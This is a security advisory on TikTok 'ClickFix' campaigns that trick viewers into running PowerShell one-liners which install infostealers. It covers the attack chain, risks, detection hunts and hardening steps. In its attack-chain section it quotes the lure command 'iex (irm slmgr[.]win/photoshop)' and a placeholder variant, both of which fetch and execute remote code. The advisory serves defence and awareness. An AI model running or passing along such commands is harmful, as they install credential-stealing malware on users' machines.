TikTok “ClickFix” Campaigns Keep Pushing Infostealers via One-Line PowerShell Lures

---

Introduction: the problem and the tactic

Threat actors are publishing TikTok videos that masquerade as quick “activation” or “fix” guides for Windows, Microsoft 365, Adobe apps, CapCut Pro, Discord Nitro, and even streaming services. Viewers are instructed to run a single, copy-pasted PowerShell one-liner as Administrator, which silently pulls and runs a second-stage script that drops infostealers. This is a textbook use of the ClickFix social-engineering technique: get users to execute the malware themselves under the guise of a harmless “fix.”

In brief

• What’s new: Fresh TikTok videos continue to push one-line PowerShell commands (e.g., iex (irm <domain>/<app>)) that fetch payloads such as Aura (Auro) Stealer; some chains also load an extra .NET-compiled in-memory module of unclear purpose.
• Why it works: ClickFix relies on user-driven code execution (Run dialog/PowerShell), which sidesteps many automated controls and web filtering.
• Impact: Exfiltration of browser creds, cookies, crypto wallets, and application secrets; likely account takeovers and downstream business compromise.
• Scale & precedent: TikTok-based ClickFix campaigns distributing Vidar and StealC were documented earlier in 2025; today’s activity shows the pattern persists and evolves.

Context / history / connections

ClickFix emerged in early 2024 and has since been adopted across phishing, malvertising, and compromised sites—often spoofing brands or CAPTCHAs and instructing users to paste commands into Run/Terminal/PowerShell. Microsoft tracks multiple actors using ClickFix to deliver loaders, RATs, and infostealers (Lumma, Latrodectus, NetSupport, etc.), including macOS targeting. Security teams have also observed kits for sale that generate ClickFix landing pages.

Trend Micro’s May 2025 research highlighted TikTok videos—likely AI-generated—guiding viewers to run one-liners that ultimately delivered Vidar or StealC. Palo Alto Networks Unit 42 later detailed ClickFix chains for Lumma, Latrodectus, and NetSupport with concrete hunting tips, underscoring the technique’s commoditization.

Technical analysis / details of the vulnerability (attack chain)

Recent videos display commands like:

iex (irm slmgr[.]win/photoshop)

The domain segment changes with the “product” being “activated.” Executing the command pulls another PowerShell script, which then downloads two EXEs from Cloudflare Pages. The first (updater.exe) is Aura (Auro) Stealer, which harvests saved browser logins, cookies, crypto wallets, and app credentials. A second payload (source.exe) compiles C# code on the fly (via csc.exe) and injects shellcode in memory, acting as an additional in-memory stage.

Key traits seen across ClickFix:

• User-level code execution: instructions to open Run/PowerShell and paste code.
• Living-off-the-land: PowerShell, mshta, regasm, msbuild; heavy use of in-memory execution.
• Defense evasion: clipboard tricks, obfuscated one-liners, scheduled tasks/persistence, and brand impersonation (e.g., Cloudflare Turnstile lures).

Earlier TikTok chains used similar one-liners (e.g., iex (irm https://<domain>/spotify)), then added Defender exclusions, fetched Vidar/StealC second stages, and set persistence, with C2 resolution via Steam/Telegram DDR.

Practical consequences / risks

• Credential & cookie theft → account takeover: Attackers can bypass MFA with session cookies, pivot into corporate SaaS (email, code repos, finance).
• Rapid replay and resale: Stolen data fuels fraud, ransomware initial access, and marketplace resale.
• Hybrid targeting: Consumers chasing “free activations” and employees on unmanaged/poorly locked-down machines are both at risk.

Operational recommendations / what to do next

Immediate actions for anyone who ran a TikTok one-liner:

1. Assume compromise of all stored credentials; rotate passwords and revoke sessions (browsers, email, cloud, crypto, VPN).
2. Isolate and reimage endpoints if feasible; at minimum, run a reputable EDR scan and check for suspicious scheduled tasks and startup entries.

Enterprise hardening & detection:

• Policy & UX controls: Disable/limit Run dialog/PowerShell for non-admin users; enable PowerShell Constrained Language Mode where possible.
• EDR hunts / SIEM analytics (seed queries):
  • Process chains where explorer.exe → powershell.exe with network activity soon after.
  • Paste/clipboard events preceding PowerShell or mshta.exe, and creation of scheduled tasks at logon.
  • Look for LOLBins (regasm, msbuild, rundll32) loading .NET assemblies in memory.
• Web & mail protections: Block known ClickFix infrastructure and lookalike domains; aggressively filter malvertising and brand-spoofed lures.
• User education: Update awareness content to explicitly say: never copy commands from web/TikTok/File Explorer address bar into system tools. Show real screenshots of lures so staff recognize them.

Differences / comparisons with other cases

• Classic ClickFix vs. TikTok variant: Early waves used HTML attachments or fake update pages to auto-copy commands. The TikTok flavor moves the entire social-engineering script into the video itself, reducing on-page indicators and content for defenses to scan.
• Payload diversity: Today’s TikTok cases show Aura alongside earlier Vidar/StealC chains; broader ClickFix activity also drops Lumma, Latrodectus, NetSupport, and even macOS payloads.

Summary / key takeaways

• TikTok remains an active distribution surface for ClickFix, instructing users to self-execute one-liners that fetch infostealers.
• The chain often uses Cloudflare Pages/CDN infrastructure, in-memory .NET stages, and scheduled tasks for persistence.
• Treat any endpoint where such commands ran as compromised; rotate credentials and hunt for LOLBin-based, fileless execution.

Sources / bibliography

1. BleepingComputer — TikTok videos continue to push infostealers in ClickFix attacks (campaign specifics, command slmgr[.]win, Aura payloads). (BleepingComputer)
2. SANS Internet Storm Center — Xavier Mertens, TikTok Videos Promoting Malware Installation (deep dive: updater.exe/Aura, source.exe self-compiling stage, persistence). (SANS Internet Storm Center)
3. Trend Micro — TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC (earlier TikTok ClickFix wave, TTPs/IOCs). (www.trendmicro.com)
4. Microsoft Security — Think before you Click(Fix) (technique evolution, attack chain, beyond-Windows targeting, guidance). (Microsoft)
5. Palo Alto Networks Unit 42 — Fix the Click: Preventing the ClickFix Attack Vector (hunting tips, examples for Lumma/Latrodectus/NetSupport). (Unit 42)